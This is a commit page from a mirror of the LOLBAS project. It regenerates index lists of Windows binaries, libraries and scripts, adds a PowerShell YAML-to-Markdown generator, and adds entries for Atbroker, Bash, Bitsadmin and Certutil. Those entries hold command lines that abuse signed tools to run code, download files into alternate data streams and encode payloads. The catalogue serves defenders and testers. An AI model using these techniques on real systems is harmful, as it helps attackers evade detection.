mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
MD files generate from Script, and adjustments to readme
This commit is contained in:
parent
eef9e78be8
commit
c949e100bd
188
LOLBins.md
188
LOLBins.md
@ -1,102 +1,100 @@
|
||||
# LOLBins - Living Off The Land Binaries
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBin.png" height="150">
|
||||
Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
# OS BINARIES
|
||||
[Atbroker.exe](OSBinaries/Atbroker.md)
|
||||
[Bash.exe](OSBinaries/Bash.md)
|
||||
[Bitsadmin.exe](OSBinaries/Bitsadmin.md)
|
||||
[Certutil.exe](OSBinaries/Certutil.md)
|
||||
[Cmdkey.exe](OSBinaries/Cmdkey.md)
|
||||
[Cmstp.exe](OSBinaries/Cmstp.md)
|
||||
[Control.exe](OSBinaries/Control.md)
|
||||
[Csc.exe](OSBinaries/Csc.md)
|
||||
[Cscript.exe](OSBinaries/Cscript.md)
|
||||
[Dfsvc.exe](OSBinaries/Dfsvc.md)
|
||||
[Diskshadow.exe](OSBinaries/Diskshadow.md)
|
||||
[Dnscmd.exe](OSBinaries/Dnscmd.md)
|
||||
[Esentutl.exe](OSBinaries/Esentutl.md)
|
||||
[Extexport.exe](OSBinaries/Extexport.md)
|
||||
[Extrac32.exe](OSBinaries/Extrac32.md)
|
||||
[Expand.exe](OSBinaries/Expand.md)
|
||||
[Explorer.exe](OSBinaries/Explorer.md)
|
||||
[Findstr.exe](OSBinaries/Findstr.md)
|
||||
[Forfiles.exe](OSBinaries/Forfiles.md)
|
||||
[Gpscript.exe](OSBinaries/Gpscript.md)
|
||||
[Hh.exe](OSBinaries/Hh.md)
|
||||
[Ieexec.exe](OSBinaries/Ieexec.md)
|
||||
[Ie4unit.exe](OSBinaries/Ie4unit.md)
|
||||
[Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)
|
||||
[Installutil.exe](OSBinaries/Installutil.md)
|
||||
[Makecab.exe](OSBinaries/Makecab.md)
|
||||
[Mavinject.exe](OSBinaries/Mavinject.md)
|
||||
[Msbuild.exe](OSBinaries/Msbuild.md)
|
||||
[Msconfig.exe](OSBinaries/Msconfig.md)
|
||||
[Msdt.exe](OSBinaries/Msdt.md)
|
||||
[Mshta.exe](OSBinaries/Mshta.md)
|
||||
[Msiexec.exe](OSBinaries/Msiexec.md)
|
||||
[Netsh.exe](OSBinaries/Netsh.md)
|
||||
[Nltest.exe](OSBinaries/Nltest.md)
|
||||
[Odbcconf.exe](OSBinaries/Odbcconf.md)
|
||||
[Openwith.exe](OSBinaries/Openwith.md)
|
||||
[Pcalua.exe](OSBinaries/Pcalua.md)
|
||||
[Pcwrun.exe](OSBinaries/Pcwrun.md)
|
||||
[Powershell.exe](OSBinaries/Powershell.md)
|
||||
[Presentationhost.exe](OSBinaries/Presentationhost.md)
|
||||
[Print.exe](OSBinaries/Print.md)
|
||||
[Psr.exe](OSBinaries/Psr.md)
|
||||
[Reg.exe](OSBinaries/Reg.md)
|
||||
[Regedit.exe](OSBinaries/Regedit.md)
|
||||
[Regasm.exe](OSBinaries/Regasm.md)
|
||||
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
|
||||
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
||||
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
||||
[Replace.exe](OSBinaries/Replace.md)
|
||||
[Robocopy.exe](OSBinaries/Robocopy.md)
|
||||
[Rpcping.exe](OSBinaries/Rpcping.md)
|
||||
[Rundll32.exe](OSBinaries/Rundll32.md)
|
||||
[Runonce.exe](OSBinaries/Runonce.md)
|
||||
[Runscripthelper.exe](OSBinaries/Runscripthelper.md)
|
||||
[Sc.exe](OSBinaries/Sc.md)
|
||||
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
|
||||
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
|
||||
[Wab.exe](OSBinaries/Wab.md)
|
||||
[Wmic.exe](OSBinaries/Wmic.md)
|
||||
[Wscript.exe](OSBinaries/Wscript.md)
|
||||
[Xwizard.exe](OSBinaries/Xwizard.md)
|
||||
[Atbroker.exe](OSBinaries/Atbroker.exe.md)
|
||||
[Bash.exe](OSBinaries/Bash.exe.md)
|
||||
[Bitsadmin.exe](OSBinaries/Bitsadmin.exe.md)
|
||||
[Certutil.exe](OSBinaries/Certutil.exe.md)
|
||||
[Cmdkey.exe](OSBinaries/Cmdkey.exe.md)
|
||||
[Cmstp.exe](OSBinaries/Cmstp.exe.md)
|
||||
[Control.exe](OSBinaries/Control.exe.md)
|
||||
[Csc.exe](OSBinaries/Csc.exe.md)
|
||||
[Cscript.exe](OSBinaries/Cscript.exe.md)
|
||||
[Dfsvc.exe](OSBinaries/Dfsvc.exe.md)
|
||||
[Diskshadow.exe](OSBinaries/Diskshadow.exe.md)
|
||||
[Dnscmd.exe](OSBinaries/Dnscmd.exe.md)
|
||||
[Esentutl.exe](OSBinaries/Esentutl.exe.md)
|
||||
[Expand.exe](OSBinaries/Expand.exe.md)
|
||||
[Explorer.exe](OSBinaries/Explorer.exe.md)
|
||||
[Extexport.exe](OSBinaries/Extexport.exe.md)
|
||||
[Extrac32.exe](OSBinaries/Extrac32.exe.md)
|
||||
[Findstr.exe](OSBinaries/Findstr.exe.md)
|
||||
[Forfiles.exe](OSBinaries/Forfiles.exe.md)
|
||||
[Gpscript.exe](OSBinaries/Gpscript.exe.md)
|
||||
[hh.exe](OSBinaries/hh.exe.md)
|
||||
[Ie4unit.exe](OSBinaries/Ie4unit.exe.md)
|
||||
[IEExec.exe](OSBinaries/IEExec.exe.md)
|
||||
[InfDefaultInstall.exe](OSBinaries/InfDefaultInstall.exe.md)
|
||||
[InstallUtil.exe](OSBinaries/InstallUtil.exe.md)
|
||||
[Makecab.exe](OSBinaries/Makecab.exe.md)
|
||||
[Mavinject.exe](OSBinaries/Mavinject.exe.md)
|
||||
[Msbuild.exe](OSBinaries/Msbuild.exe.md)
|
||||
[Msconfig.exe](OSBinaries/Msconfig.exe.md)
|
||||
[Msdt.exe](OSBinaries/Msdt.exe.md)
|
||||
[mshta.exe](OSBinaries/mshta.exe.md)
|
||||
[Msiexec.exe](OSBinaries/Msiexec.exe.md)
|
||||
[Netsh.exe](OSBinaries/Netsh.exe.md)
|
||||
[Nltest.exe](OSBinaries/Nltest.exe.md)
|
||||
[odbcconf.exe](OSBinaries/odbcconf.exe.md)
|
||||
[Openwith.exe](OSBinaries/Openwith.exe.md)
|
||||
[Pcalua.exe](OSBinaries/Pcalua.exe.md)
|
||||
[Pcwrun.exe](OSBinaries/Pcwrun.exe.md)
|
||||
[Powershell.exe](OSBinaries/Powershell.exe.md)
|
||||
[PresentationHost.exe](OSBinaries/PresentationHost.exe.md)
|
||||
[Print.exe](OSBinaries/Print.exe.md)
|
||||
[Psr.exe](OSBinaries/Psr.exe.md)
|
||||
[reg.exe](OSBinaries/reg.exe.md)
|
||||
[Regasm.exe](OSBinaries/Regasm.exe.md)
|
||||
[regedit.exe](OSBinaries/regedit.exe.md)
|
||||
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.exe.md)
|
||||
[Regsvcs.exe](OSBinaries/Regsvcs.exe.md)
|
||||
[Regsvr32.exe](OSBinaries/Regsvr32.exe.md)
|
||||
[Replace.exe](OSBinaries/Replace.exe.md)
|
||||
[Robocopy.exe](OSBinaries/Robocopy.exe.md)
|
||||
[Rpcping.exe](OSBinaries/Rpcping.exe.md)
|
||||
[Rundll32.exe](OSBinaries/Rundll32.exe.md)
|
||||
[Runonce.exe](OSBinaries/Runonce.exe.md)
|
||||
[Runscripthelper.exe](OSBinaries/Runscripthelper.exe.md)
|
||||
[SC.exe](OSBinaries/SC.exe.md)
|
||||
[Scriptrunner.exe](OSBinaries/Scriptrunner.exe.md)
|
||||
[SyncAppvPublishingServer.exe](OSBinaries/SyncAppvPublishingServer.exe.md)
|
||||
[Wab.exe](OSBinaries/Wab.exe.md)
|
||||
[WMIC.exe](OSBinaries/WMIC.exe.md)
|
||||
[Wscript.exe](OSBinaries/Wscript.exe.md)
|
||||
[Xwizard.exe](OSBinaries/Xwizard.exe.md)
|
||||
|
||||
|
||||
|
||||
|
||||
# OTHER MICROSOFT SIGNED BINARIES
|
||||
[Appvlp.exe](OtherMSBinaries/Appvlp.md)
|
||||
[Bginfo.exe](OtherMSBinaries/Bginfo.md)
|
||||
[Cdb.exe](OtherMSBinaries/Cdb.md)
|
||||
[Csi.exe](OtherMSBinaries/Csi.md)
|
||||
[Dnx.exe](OtherMSBinaries/Dnx.md)
|
||||
[Dxcap.exe](OtherMSBinaries/Dxcap.md)
|
||||
[Mftrace.exe](OtherMSBinaries/Mftrace.md)
|
||||
[Msdeploy.exe](OtherMSBinaries/Msdeploy.md)
|
||||
[Msxsl.exe](OtherMSBinaries/Msxsl.md)
|
||||
[Rcsi.exe](OtherMSBinaries/Rcsi.md)
|
||||
[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)
|
||||
[Sqlps.exe](OtherMSBinaries/Sqlps.md)
|
||||
[Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md)
|
||||
[Te.exe](OtherMSBinaries/Te.md)
|
||||
[Tracker.exe](OtherMSBinaries/Tracker.md)
|
||||
[Vsjitdebugger.exe](OtherMSBinaries/Vsjitdebugger.md)
|
||||
[Winword.exe](OtherMSBinaries/Winword.md)
|
||||
|
||||
|
||||
|
||||
[Appvlp.exe](OtherMSBinaries/Appvlp.exe.md)
|
||||
[Bginfo.exe](OtherMSBinaries/Bginfo.exe.md)
|
||||
[Cdb.exe](OtherMSBinaries/Cdb.exe.md)
|
||||
[csi.exe](OtherMSBinaries/csi.exe.md)
|
||||
[dnx.exe](OtherMSBinaries/dnx.exe.md)
|
||||
[Dxcap.exe](OtherMSBinaries/Dxcap.exe.md)
|
||||
[Mftrace.exe](OtherMSBinaries/Mftrace.exe.md)
|
||||
[Msdeploy.exe](OtherMSBinaries/Msdeploy.exe.md)
|
||||
[msxsl.exe](OtherMSBinaries/msxsl.exe.md)
|
||||
[rcsi.exe](OtherMSBinaries/rcsi.exe.md)
|
||||
[Sqldumper.exe](OtherMSBinaries/Sqldumper.exe.md)
|
||||
[Sqlps.exe](OtherMSBinaries/Sqlps.exe.md)
|
||||
[SQLToolsPS.exe](OtherMSBinaries/SQLToolsPS.exe.md)
|
||||
[te.exe](OtherMSBinaries/te.exe.md)
|
||||
[Tracker.exe](OtherMSBinaries/Tracker.exe.md)
|
||||
[vsjitdebugger.exe](OtherMSBinaries/vsjitdebugger.exe.md)
|
||||
[winword.exe](OtherMSBinaries/winword.exe.md)
|
||||
|
||||
|
||||
|
||||
# OTHER NON MICROSOFT BINARIES
|
||||
[AcroRd32.exe](OtherBinaries/AcroRd32.md)
|
||||
[Gpup.exe](OtherBinaries/Gpup.md)
|
||||
[Nlnotes.exe](OtherBinaries/Nlnotes.md)
|
||||
[Notes.exe](OtherBinaries/Notes.md)
|
||||
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
|
||||
[Nvudisp.exe](OtherBinaries/Nvudisp.md)
|
||||
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)
|
||||
[Usbinst.exe](OtherBinaries/Usbinst.md)
|
||||
[ROCCAT_Swarm.exe](OtherBinaries/ROCCAT_Swarm.md)
|
||||
[Setup.exe](OtherBinaries/Setup.md) - Launches HP Installer for HP LaserJet Enterprise 700 color MFP M775 Printer Series Full Software and Drivers
|
||||
[AcroRd32.exe](OtherBinaries/AcroRd32.exe.md)
|
||||
[Gpup.exe](OtherBinaries/Gpup.exe.md)
|
||||
[Nlnotes.exe](OtherBinaries/Nlnotes.exe.md)
|
||||
[Notes.exe](OtherBinaries/Notes.exe.md)
|
||||
[Nvudisp.exe](OtherBinaries/Nvudisp.exe.md)
|
||||
[Nvuhda6.exe](OtherBinaries/Nvuhda6.exe.md)
|
||||
[ROCCAT_Swarm.exe](OtherBinaries/ROCCAT_Swarm.exe.md)
|
||||
[Setup.exe](OtherBinaries/Setup.exe.md)
|
||||
[Usbinst.exe](OtherBinaries/Usbinst.exe.md)
|
||||
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.exe.md)
|
||||
|
34
LOLLibs.md
34
LOLLibs.md
@ -1,25 +1,15 @@
|
||||
# LOLLibs - Living Off The Land Libraries
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLLib.png" height="150">
|
||||
Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
# OS LIBRARIES
|
||||
[Advpack.dll](OSLibraries/Advpack.md)
|
||||
[Ieadvpack.dll](OSLibraries/Ieadvpack.md)
|
||||
[Ieframe.dll](OSLibraries/Ieframe.md)
|
||||
[Mshtml.dll](OSLibraries/Mshtml.md)
|
||||
[Pcwutl.dll](OSLibraries/Pcwutl.md)
|
||||
[Shdocvw.dll](OSLibraries/Shdocvw.md)
|
||||
[Zipfldr.dll](OSLibraries/Zipfldr.md)
|
||||
[Shell32.dll](OSLibraries/Shell32.md)
|
||||
[Setupapi.dll](OSLibraries/Setupapi.md)
|
||||
[Url.dll](OSLibraries/Url.md)
|
||||
[Zipfldr.dll](OSLibraries/Zipfldr.md)
|
||||
|
||||
# OTHER MICROSOFT SIGNED LIBRARIES
|
||||
|
||||
|
||||
# OTHER NON MICROSOFT LIBRARIES
|
||||
|
||||
|
||||
|
||||
[Advpack.dll](OSLibraries/Advpack.dll.md)
|
||||
[Ieadvpack.dll](OSLibraries/Ieadvpack.dll.md)
|
||||
[Ieframe.dll](OSLibraries/Ieframe.dll.md)
|
||||
[Mshtml.dll](OSLibraries/Mshtml.dll.md)
|
||||
[Pcwutl.dll](OSLibraries/Pcwutl.dll.md)
|
||||
[Setupapi.dll](OSLibraries/Setupapi.dll.md)
|
||||
[Shdocvw.dll](OSLibraries/Shdocvw.dll.md)
|
||||
[Shell32.dll](OSLibraries/Shell32.dll.md)
|
||||
[Syssetup.dll](OSLibraries/Syssetup.dll.md)
|
||||
[Url.dll](OSLibraries/Url.dll.md)
|
||||
[Zipfldr.dll](OSLibraries/Zipfldr.dll.md)
|
||||
|
@ -1,23 +1,17 @@
|
||||
# LOLScripts - Living Off The Land Scripts
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLScript.png" height="150">
|
||||
|
||||
Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
# OS SCRIPTS
|
||||
[Cl_invocation.ps1](OSScrits/Cl_invocation.md)
|
||||
[CL_mutexverifiers.ps1](OSScripts/CL_mutexverifiers.md)
|
||||
[Manage-bde.vbs](OSScripts/Manage-bde.md)
|
||||
[pester.bat](OSScripts/pester.md)
|
||||
[Pubprn.vbs](OSScripts/Pubprn.md)
|
||||
[Slmgr.vbs](OSScripts/Slmgr.md)
|
||||
[Syncappvpublishingserver.vbs](OSScripts/Syncappvpublishingserver.md)
|
||||
[Winrm.vbs](OSScripts/Winrm.md)
|
||||
|
||||
|
||||
|
||||
# OTHER MICROSOFT SIGNED SCRIPTS
|
||||
|
||||
|
||||
|
||||
# OTHER NON MICROSOFT BINARIES
|
||||
[Testxlst.js](OtherScripts/Testxlst.md)
|
||||
[CL_Invocation.ps1](OSSCripts/CL_Invocation.ps1.md)
|
||||
[CL_Mutexverifiers.ps1](OSSCripts/CL_Mutexverifiers.ps1.md)
|
||||
[Manage-bde.wsf](OSSCripts/Manage-bde.wsf.md)
|
||||
[pester.bat](OSSCripts/pester.bat.md)
|
||||
[Pubprn.vbs](OSSCripts/Pubprn.vbs.md)
|
||||
[Slmgr.vbs](OSSCripts/Slmgr.vbs.md)
|
||||
[SyncAppvPublishingServer.vbs](OSSCripts/SyncAppvPublishingServer.vbs.md)
|
||||
[Winrm.vbs](OSSCripts/Winrm.vbs.md)
|
||||
|
||||
|
||||
|
||||
# OTHER NON MICROSOFT SCRIPTS
|
||||
[testxlst.js](OtherScripts/testxlst.js.md)
|
||||
|
261
Mgmt-Scripts/CreateMDFromYaml.ps1
Normal file
261
Mgmt-Scripts/CreateMDFromYaml.ps1
Normal file
@ -0,0 +1,261 @@
|
||||
#A hacky script to convert YML to MD file the way I want
|
||||
# Used primarly for generating MD files to the LOLBAS-Project site
|
||||
#Author: Oddvar Moe
|
||||
#If you can use it, be my guest!
|
||||
|
||||
$mainpath = "C:\data\gitprojects\LOLBAS"
|
||||
|
||||
|
||||
function Convert-YamlToMD
|
||||
{
|
||||
[CmdletBinding()]
|
||||
Param
|
||||
(
|
||||
[Parameter(Mandatory=$true)]
|
||||
$YamlObject,
|
||||
|
||||
[Parameter(Mandatory=$true)]
|
||||
[String]
|
||||
$Outfile
|
||||
)
|
||||
|
||||
Begin
|
||||
{
|
||||
}
|
||||
Process
|
||||
{
|
||||
# Header
|
||||
"`#`# $($YamlObject.Name)" | Add-Content $Outfile
|
||||
"* Functions: $($YamlObject.Description)" | Add-Content $Outfile
|
||||
|
||||
"``````" | Add-Content $Outfile
|
||||
foreach($cmd in $YamlObject.Commands)
|
||||
{
|
||||
"`n$($cmd.command)" | Add-Content $Outfile
|
||||
"$($cmd.description)" | Add-Content $Outfile
|
||||
}
|
||||
"``````" | Add-Content $Outfile
|
||||
|
||||
" " | Add-Content $Outfile
|
||||
|
||||
"* Resources: " | Add-Content $Outfile
|
||||
foreach($link in $YamlObject.Resources)
|
||||
{
|
||||
" * $($link)" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
" " | Add-Content $Outfile
|
||||
|
||||
"* Full path: " | Add-Content $Outfile
|
||||
foreach($path in $YamlObject.'Full path')
|
||||
{
|
||||
" * $($path)" | Add-Content $outfile
|
||||
}
|
||||
|
||||
" " | Add-Content $Outfile
|
||||
|
||||
"* Notes: $($YamlObject.Notes) " | Add-Content $Outfile
|
||||
|
||||
" " | Add-Content $Outfile
|
||||
}
|
||||
End
|
||||
{
|
||||
}
|
||||
}
|
||||
|
||||
function Add-MainIndex
|
||||
{
|
||||
[CmdletBinding()]
|
||||
Param
|
||||
(
|
||||
[Parameter(Mandatory=$true)]
|
||||
$YamlObject,
|
||||
|
||||
[Parameter(Mandatory=$true)]
|
||||
[String]
|
||||
$Outfile,
|
||||
|
||||
[Parameter(Mandatory=$true)]
|
||||
[String]
|
||||
$Type
|
||||
)
|
||||
|
||||
Begin
|
||||
{
|
||||
}
|
||||
Process
|
||||
{
|
||||
# Header
|
||||
# OS BINARIES
|
||||
#[Atbroker.exe](OSBinaries/Atbroker.md)
|
||||
|
||||
if($Type -eq "OSBinaries") {
|
||||
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OSLibraries") {
|
||||
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OSScripts") {
|
||||
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OtherBinaries") {
|
||||
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OtherMSBinaries") {
|
||||
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OtherScripts") {
|
||||
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
|
||||
}
|
||||
#"" | Add-Content $Outfile
|
||||
}
|
||||
End
|
||||
{
|
||||
}
|
||||
}
|
||||
|
||||
function New-MainIndex
|
||||
{
|
||||
[CmdletBinding()]
|
||||
Param
|
||||
(
|
||||
[Parameter(Mandatory=$true)]
|
||||
[String]
|
||||
$Outfile,
|
||||
|
||||
[Parameter(Mandatory=$true)]
|
||||
[String]
|
||||
$Type
|
||||
)
|
||||
|
||||
Begin
|
||||
{
|
||||
}
|
||||
Process
|
||||
{
|
||||
if($Type -eq "OSBinaries") {
|
||||
"`# LOLBins - Living Off The Land Binaries" | Add-Content $Outfile
|
||||
"Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). " | Add-Content $Outfile
|
||||
" " | Add-Content $Outfile
|
||||
"`# OS BINARIES" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OtherMSBinaries") {
|
||||
" " | Add-content $Outfile
|
||||
" " | Add-content $Outfile
|
||||
" " | Add-content $Outfile
|
||||
|
||||
"`# OTHER MICROSOFT SIGNED BINARIES" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OtherBinaries") {
|
||||
" " | Add-content $Outfile
|
||||
" " | Add-content $Outfile
|
||||
" " | Add-content $Outfile
|
||||
|
||||
"`# OTHER NON MICROSOFT BINARIES" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OSScripts") {
|
||||
"`# LOLScripts - Living Off The Land Scripts" | Add-Content $Outfile
|
||||
"Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). " | Add-Content $Outfile
|
||||
" " | Add-Content $Outfile
|
||||
"`# OS SCRIPTS" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OtherScripts") {
|
||||
" " | Add-content $Outfile
|
||||
" " | Add-content $Outfile
|
||||
" " | Add-content $Outfile
|
||||
|
||||
"`# OTHER NON MICROSOFT SCRIPTS" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
if($Type -eq "OSLibraries") {
|
||||
"`# LOLLibs - Living Off The Land Libraries" | Add-Content $Outfile
|
||||
"Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). " | Add-Content $Outfile
|
||||
" " | Add-Content $Outfile
|
||||
"`# OS LIBRARIES" | Add-Content $Outfile
|
||||
}
|
||||
|
||||
}
|
||||
End
|
||||
{
|
||||
}
|
||||
}
|
||||
|
||||
function Invoke-GenerateMD
|
||||
{
|
||||
[CmdletBinding()]
|
||||
Param
|
||||
(
|
||||
[Parameter(Mandatory=$true)]
|
||||
[String]
|
||||
$Ymlpath,
|
||||
|
||||
[Parameter(Mandatory=$true)]
|
||||
[String]
|
||||
$Outpath,
|
||||
|
||||
[Parameter(Mandatory=$true)]
|
||||
[String]
|
||||
$indexfile
|
||||
)
|
||||
|
||||
Begin
|
||||
{
|
||||
}
|
||||
Process
|
||||
{
|
||||
|
||||
#Initialize index files
|
||||
New-MainIndex -Type $($Outpath.Split("\")[-1]) -Outfile $indexfile
|
||||
|
||||
|
||||
|
||||
# Read yaml files
|
||||
$bins = @()
|
||||
cd
|
||||
get-childitem -Path $Ymlpath -File | foreach{
|
||||
Write-Verbose "Add yamls to array"
|
||||
write-verbose $_
|
||||
|
||||
[string[]]$fileContent = Get-Content $_.FullName
|
||||
$content = ''
|
||||
foreach ($line in $fileContent) { $content = $content + "`n" + $line }
|
||||
$yaml = ConvertFrom-YAML $content
|
||||
$bins += $yaml
|
||||
}
|
||||
|
||||
$bins | foreach{
|
||||
Write-Verbose "Converting files to yaml"
|
||||
write-verbose "$($_.name)"
|
||||
|
||||
Convert-YamlToMD -YamlObject $_ -Outfile "$Outpath\$($_.name).md"
|
||||
Add-MainIndex -YamlObject $_ -Outfile $indexfile -Type $($Outpath.Split("\")[-1])
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
End
|
||||
{
|
||||
}
|
||||
}
|
||||
|
||||
#Generate the stuff!
|
||||
#Bins
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "$mainpath\OSBinaries" -indexfile "$mainpath\LOLBins.md" -Verbose
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "$mainpath\OtherMSBinaries" -indexfile "$mainpath\LOLBins.md" -Verbose
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherBinaries" -Outpath "$mainpath\OtherBinaries" -indexfile "$mainpath\LOLBins.md" -Verbose
|
||||
|
||||
#Scripts
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "$mainpath\OSSCripts" -indexfile "$mainpath\LOLScripts.md" -Verbose
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherScripts" -Outpath "$mainpath\OtherScripts" -indexfile "$mainpath\LOLScripts.md" -Verbose
|
||||
|
||||
#Libs
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "$mainpath\OSLibraries" -indexfile "$mainpath\LOLLibs.md" -Verbose
|
18
OSBinaries/Atbroker.exe.md
Normal file
18
OSBinaries/Atbroker.exe.md
Normal file
@ -0,0 +1,18 @@
|
||||
## Atbroker.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
ATBroker.exe /start malware
|
||||
Start a registered Assistive Technology (AT).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\Atbroker.exe
|
||||
* C:\Windows\SysWOW64\Atbroker.exe
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
|
||||
|
||||
|
16
OSBinaries/Bash.exe.md
Normal file
16
OSBinaries/Bash.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## Bash.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
bash.exe -c calc.exe
|
||||
Execute calc.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
*
|
||||
|
||||
* Full path:
|
||||
* ?
|
||||
|
||||
* Notes: Thanks to ?
|
||||
|
40
OSBinaries/Bitsadmin.exe.md
Normal file
40
OSBinaries/Bitsadmin.exe.md
Normal file
@ -0,0 +1,40 @@
|
||||
## Bitsadmin.exe
|
||||
* Functions: Execute, Download, Copy, Read ADS
|
||||
```
|
||||
|
||||
bitsadmin /create 1
|
||||
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
|
||||
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
|
||||
bitsadmin /RESUME 1
|
||||
bitsadmin /complete 1
|
||||
|
||||
|
||||
|
||||
|
||||
Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
|
||||
bitsadmin /create 1
|
||||
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
|
||||
bitsadmin /RESUME 1
|
||||
bitsadmin /complete 1
|
||||
|
||||
Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
|
||||
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||
One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
|
||||
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
||||
One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
|
||||
* https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
||||
* Full path:
|
||||
* c:\Windows\System32\bitsadmin.exe
|
||||
* c:\Windows\SysWOW64\bitsadmin.exe
|
||||
|
||||
* Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe
|
||||
|
26
OSBinaries/Certutil.exe.md
Normal file
26
OSBinaries/Certutil.exe.md
Normal file
@ -0,0 +1,26 @@
|
||||
## Certutil.exe
|
||||
* Functions: Download, Add ADS, Decode, Encode
|
||||
```
|
||||
|
||||
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||
Download and save 7zip to disk in the current folder.
|
||||
|
||||
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||||
Download and save a PS1 file to an Alternate Data Stream (ADS).
|
||||
|
||||
certutil -encode inputFileName encodedOutputFileName
|
||||
certutil -decode encodedInputFileName decodedOutputFileName
|
||||
|
||||
Commands to encode and decode a file using Base64.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
